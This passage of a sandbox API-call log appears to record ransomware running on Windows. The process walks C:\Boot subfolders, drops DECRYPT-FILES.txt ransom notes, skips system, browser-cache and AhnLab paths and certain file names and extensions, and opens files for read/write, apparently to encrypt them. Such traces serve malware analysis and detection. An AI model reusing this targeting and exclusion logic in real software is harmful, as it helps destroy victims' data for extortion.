[0179.343] CloseHandle (hObject=0x0) returned 0 [0179.343] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.343] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.344] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.344] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.344] FindClose (in: hFindFile=0x4797f8 | out: hFindFile=0x4797f8) returned 1 [0179.344] CloseHandle (hObject=0xffffffff) returned 0 [0179.344] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0179.344] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0179.344] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0179.344] lstrcatW (in: lpString1="de-DE", lpString2="\\" | out: lpString1="de-DE\\") returned="de-DE\\" [0179.344] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="de-DE\\" | out: lpString1="C:\\Boot\\de-DE\\") returned="C:\\Boot\\de-DE\\" [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\Program Files") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch=":\\Windows") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\Games\\") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\All Users") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="AhnLab") returned 0x0 [0179.344] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.344] lstrlenW (lpString="C:\\Boot\\de-DE\\") returned 14 [0179.344] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.344] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\de-DE\\\\0a16c9.tmp") returned 25 [0179.345] CreateFileW (lpFileName="C:\\Boot\\de-DE\\\\0a16c9.tmp" (normalized: "c:\\boot\\de-de\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.345] GetLastError () returned 0x5 [0179.345] lstrlenW (lpString="C:\\Boot\\de-DE\\") returned 14 [0179.345] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.345] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\de-DE\\\\DECRYPT-FILES.txt") returned 32 [0179.345] CreateFileW (lpFileName="C:\\Boot\\de-DE\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\de-de\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.362] lstrlenW (lpString="C:\\Boot\\de-DE\\") returned 14 [0179.362] lstrcatW (in: lpString1="C:\\Boot\\de-DE\\", lpString2="*" | out: lpString1="C:\\Boot\\de-DE\\*") returned="C:\\Boot\\de-DE\\*" [0179.362] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4797f8 [0179.363] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.363] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.363] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.363] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.363] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.363] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.363] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.363] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.363] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.363] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.363] lstrlenW (lpString="C:\\Boot\\de-DE\\") returned 14 [0179.363] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.363] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\de-DE\\" | out: lpString1="C:\\Boot\\de-DE\\") returned="C:\\Boot\\de-DE\\" [0179.363] lstrcatW (in: lpString1="C:\\Boot\\de-DE\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned="C:\\Boot\\de-DE\\bootmgr.exe.mui" [0179.363] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x6a0000 [0179.363] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.364] CloseHandle (hObject=0x0) returned 0 [0179.364] VirtualFree (lpAddress=0x6a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.364] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.364] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.364] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.364] FindClose (in: hFindFile=0x4797f8 | out: hFindFile=0x4797f8) returned 1 [0179.364] CloseHandle (hObject=0xffffffff) returned 0 [0179.364] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a2cde0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a2cde0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a2cde0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.364] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.364] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0179.364] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0179.364] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0179.364] lstrcatW (in: lpString1="el-GR", lpString2="\\" | out: lpString1="el-GR\\") returned="el-GR\\" [0179.364] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="el-GR\\" | out: lpString1="C:\\Boot\\el-GR\\") returned="C:\\Boot\\el-GR\\" [0179.364] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\Program Files") returned 0x0 [0179.364] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch=":\\Windows") returned 0x0 [0179.364] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\Games\\") returned 0x0 [0179.364] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.364] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.364] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.364] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.364] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.364] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\All Users") returned 0x0 [0179.364] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.364] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.365] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.365] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="AhnLab") returned 0x0 [0179.365] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.365] lstrlenW (lpString="C:\\Boot\\el-GR\\") returned 14 [0179.365] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.365] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\el-GR\\\\0a16c9.tmp") returned 25 [0179.365] CreateFileW (lpFileName="C:\\Boot\\el-GR\\\\0a16c9.tmp" (normalized: "c:\\boot\\el-gr\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.365] GetLastError () returned 0x5 [0179.365] lstrlenW (lpString="C:\\Boot\\el-GR\\") returned 14 [0179.365] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.365] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\el-GR\\\\DECRYPT-FILES.txt") returned 32 [0179.365] CreateFileW (lpFileName="C:\\Boot\\el-GR\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\el-gr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.365] lstrlenW (lpString="C:\\Boot\\el-GR\\") returned 14 [0179.365] lstrcatW (in: lpString1="C:\\Boot\\el-GR\\", lpString2="*" | out: lpString1="C:\\Boot\\el-GR\\*") returned="C:\\Boot\\el-GR\\*" [0179.365] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4797f8 [0179.365] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.365] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.365] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.365] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.365] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.365] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.365] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.366] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.366] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.366] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.366] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.366] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.366] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.366] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.366] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.366] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.366] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.366] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.366] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.366] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.366] lstrlenW (lpString="C:\\Boot\\el-GR\\") returned 14 [0179.366] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.366] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\el-GR\\" | out: lpString1="C:\\Boot\\el-GR\\") returned="C:\\Boot\\el-GR\\" [0179.366] lstrcatW (in: lpString1="C:\\Boot\\el-GR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned="C:\\Boot\\el-GR\\bootmgr.exe.mui" [0179.366] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x6a0000 [0179.366] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.381] CloseHandle (hObject=0x0) returned 0 [0179.381] VirtualFree (lpAddress=0x6a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.381] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ac5360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.381] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.381] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ac5360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.381] FindClose (in: hFindFile=0x4797f8 | out: hFindFile=0x4797f8) returned 1 [0179.381] CloseHandle (hObject=0xffffffff) returned 0 [0179.381] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0179.381] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0179.381] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0179.381] lstrcatW (in: lpString1="en-US", lpString2="\\" | out: lpString1="en-US\\") returned="en-US\\" [0179.381] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="en-US\\" | out: lpString1="C:\\Boot\\en-US\\") returned="C:\\Boot\\en-US\\" [0179.381] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\Program Files") returned 0x0 [0179.381] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch=":\\Windows") returned 0x0 [0179.381] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\Games\\") returned 0x0 [0179.381] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.381] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.381] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.381] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.381] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.381] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\All Users") returned 0x0 [0179.381] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.381] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.382] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.382] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="AhnLab") returned 0x0 [0179.382] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.382] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0179.382] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.382] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\en-US\\\\0a16c9.tmp") returned 25 [0179.382] CreateFileW (lpFileName="C:\\Boot\\en-US\\\\0a16c9.tmp" (normalized: "c:\\boot\\en-us\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.521] GetLastError () returned 0x5 [0179.521] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0179.521] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.521] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\en-US\\\\DECRYPT-FILES.txt") returned 32 [0179.521] CreateFileW (lpFileName="C:\\Boot\\en-US\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\en-us\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.536] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0179.536] lstrcatW (in: lpString1="C:\\Boot\\en-US\\", lpString2="*" | out: lpString1="C:\\Boot\\en-US\\*") returned="C:\\Boot\\en-US\\*" [0179.536] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.537] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.537] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.537] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.537] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.537] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.537] lstrcmpiW 